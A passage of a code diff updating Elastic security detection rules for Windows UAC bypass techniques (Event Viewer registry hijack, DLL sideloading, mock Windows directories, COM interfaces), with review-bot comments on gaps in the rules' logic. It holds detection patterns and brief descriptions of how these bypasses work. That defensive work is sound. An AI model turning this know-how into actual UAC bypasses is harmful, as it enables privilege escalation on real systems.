enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
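Review bot: The exclusion `not process.executable : "C:\\Windows\\System32\\ClipUp.exe"` hardcodes the system drive, so on a host where Windows is installed on another volume the legitimate ClipUp.exe spawned by dllhost.exe for the IEditionUpgradeManager CLSID alerts on every call. The PrintSpooler rule touched in this same diff already uses the drive-agnostic `?:\\Windows\\...` form for `file.path`; the same fits here: `not process.executable : "?:\\Windows\\System32\\ClipUp.exe"`. The rest of the rule object (tags, threat mapping, version) is in the following hunk.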
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json index d759d0f2a4875..e7c01d0bc61e3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_ieinstal.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.executable : \"C:\\\\*\\\\AppData\\\\*\\\\Temp\\\\IDC*.tmp\\\\*.exe\" and\n process.parent.name : \"ieinstal.exe\" and process.parent.args : \"-Embedding\"\n\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", "references": [ "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
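Review bot: The query still ships the disabled exclusion `/* uncomment once in winlogbeat */ /* and not (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true) */`, and this commit adds `required_fields` without any `process.code_signature.*` entry, so the rule is consciously left without its signature-based false-positive filter. Either the data sources now carry code-signature data and the clause should be enabled (with the two fields added to `required_fields`), or the TODO comment should be dropped so operators do not assume the filter is active; a stale TODO inside a shipped detection query is misleading. The `process.executable : "C:\\*\\AppData\\*\\Temp\\IDC*.tmp\\*.exe"` pattern also hardcodes `C:`; `?:\\*\\AppData\\*\\Temp\\IDC*.tmp\\*.exe` is the form used elsewhere in this change.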
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json index 3e6dfc998b5e4..b68a0a74d80a7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_interface_icmluautil.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via ICMLuaUtil Elevated COM Interface", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name == \"dllhost.exe\" and\n process.parent.args in (\"/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\", \"/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}\") and\n process.pe.original_file_name != \"WerFault.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json index 84cb66211e5e2..03763396bdac9 100644 
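Review bot: Declaring `process.pe.original_file_name` in `required_fields` is the right call, because the clause `process.pe.original_file_name != "WerFault.exe"` makes the whole rule depend on PE metadata: on sources that do not populate it (Sysmon via Winlogbeat, for example) a comparison against a missing field evaluates to null rather than true in Elasticsearch EQL, as far as I recall, so the event is dropped and the rule goes silent instead of merely skipping the WerFault exclusion — worth confirming on a Sysmon sample. If that holds, rewriting it as `not process.pe.original_file_name : "WerFault.exe"` likely has the same problem; expressing the exclusion on a field every process source populates, e.g. `not process.executable : "?:\\Windows\\System32\\WerFault.exe"`, would keep the rule alive on such data at the cost of not catching a renamed WerFault. The `setup` text should also say that PE metadata is required for this rule to fire. The remaining rule keys are in the next hunk.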
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_diskcleanup_hijack.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via DiskCleanup Scheduled Task Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.args : \"/autoclean\" and process.args : \"/d\" and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\cleanmgr.exe\",\n \"C:\\\\Windows\\\\System32\\\\taskhostw.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } 
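Review bot: All three paths in `not process.executable : ("C:\\Windows\\System32\\cleanmgr.exe", "C:\\Windows\\SysWOW64\\cleanmgr.exe", "C:\\Windows\\System32\\taskhostw.exe")` hardcode the system drive, so on an installation where Windows is not on `C:` every scheduled SilentCleanup run is reported as a hijack. Replace the prefix with `?:\\Windows\\...` as the PrintSpooler rule in this same diff does; the new `required_fields` entries are otherwise accurate for the query. The rule object begins above this hunk and its version bump is the second hunk on this line.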
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json index 3ee72bac00507..8b9e32e4968f3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_dll_sideloading.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Privileged IFileOperation COM Interface", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type : \"change\" and process.name : \"dllhost.exe\" and\n /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */\n file.name : (\"wow64log.dll\", \"comctl32.dll\", \"DismCore.dll\", \"OskSupport.dll\", \"duser.dll\", \"Accessibility.ni.dll\") and\n /* has no impact on rule logic just to avoid OS install related FPs */\n not file.path : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*\", \"C:\\\\Windows\\\\WinSxS\\\\*\")\n", "references": [ "https://github.com/hfiref0x/UACME" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
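Review bot: The `file where event.type : "change"` filter only matches modifications, so if the data source reports a newly written file as a creation event rather than a change, the common case of dllhost.exe dropping a fresh `wow64log.dll`/`comctl32.dll` into a path that will be sideloaded is not covered; the exact file-event taxonomy is not visible in this hunk, so please confirm and, if so, widen to `event.type : ("change", "creation")`. The `file.path` exclusions are also pinned to `C:\\Windows\\SoftwareDistribution\\*` and `C:\\Windows\\WinSxS\\*` whereas the other rules in this change use `?:\\Windows\\…`, so the OS-install FP suppression the query comment describes silently stops working on a non-`C:` system drive. The `"note": ""` drops all analyst guidance for a high-severity rule while its neighbours gained a full triage section; if that is deliberate a short note is still better than an empty one.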
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json index 6c02f1d5587af..cd1b190332fe6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json 
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable : \n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\", \n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) \nto perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nUAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the \nlocal administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command`\nregistry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location\nof another binary or script is added to this registry value, it will be executed as a high-integrity process without a\nUAC prompt being displayed to the user. 
This rule detects this UAC bypass by monitoring processes spawned by\n`eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json index 7da33e8648100..c1aac3e37f939 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json 
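Review bot: The triage guide in `note` correctly identifies `HKCU\Software\Classes\mscfile\shell\open\command` as the hijack mechanism, but neither "Possible investigation steps" nor "Response and remediation" ever tells the analyst to inspect or restore that value, so the primary artifact of this technique is left out of the playbook. Suggest adding under investigation steps `- Inspect the \`HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\` value for the user; any data other than the default mmc.exe invocation is the hijack artifact and should be captured before removal.` and under remediation `- Delete the rogue \`mscfile\\shell\\open\\command\` value (or the whole key) so eventvwr.exe falls back to the HKLM default.` The query itself is unchanged apart from whitespace, so no detection comment here.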
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json 
@@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) \nto perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nUAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the \nlocal administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows\ndirectory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- If any of the spawned processes are suspicious, retrieve them and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json index 6ca1058cebc7f..2417360fe9368 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json 
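Review bot: The `query` only inspects `process.args` for `C:\\Windows \\system32\\*.exe` / `C:\\Windows \\SysWOW64\\*.exe`, so a binary launched from the mocked directory is caught only if the spoofed path is echoed into the argument list; the executable's own location is in `process.executable`, which the rule never checks. Consider `or process.executable : ("?:\\Windows \\system32\\*", "?:\\Windows \\SysWOW64\\*")` so the match does not depend on how the process was invoked, and drop the `*.exe` suffix since the referenced technique is about the trusted-directory check, not the file extension. As with the other rules in this change, the hard-coded `C:` should become `?:` to match the drive wildcard used by the event-viewer rule. The new triage text reads well; these remarks are about the unchanged detection logic it now documents.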
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) \nto perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nUAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the \nlocal administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC)\nWindows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- If any of the spawned processes are suspicious, retrieve them and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json index 5fb9682323ac5..8340ac3f4629b 100644 
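Review bot: The `query` uses `==`/`!=` (`process.parent.name == "mmc.exe"`, `process.parent.args == "WF.msc"`, `process.name != "WerFault.exe"`), which in EQL are case-sensitive on keyword fields, whereas every sibling rule in this change uses the case-insensitive `:` operator; a `wf.msc` argument or a `werfault.exe` child (the lowercase spelling the parent-child rule below already excludes) would respectively be missed or not be suppressed. Suggest `process.parent.name : "mmc.exe" and`, `process.parent.args : "WF.msc" and not process.name : "WerFault.exe"` so matching is consistent across the rule set. The in-query comment about `process.Ext.token.integrity_level_name == "high"` could be updated at the same time to use `:`. Otherwise the added triage guide mirrors the others and looks fine.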
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json 
@@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these\ncharacteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the\nsystem and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse 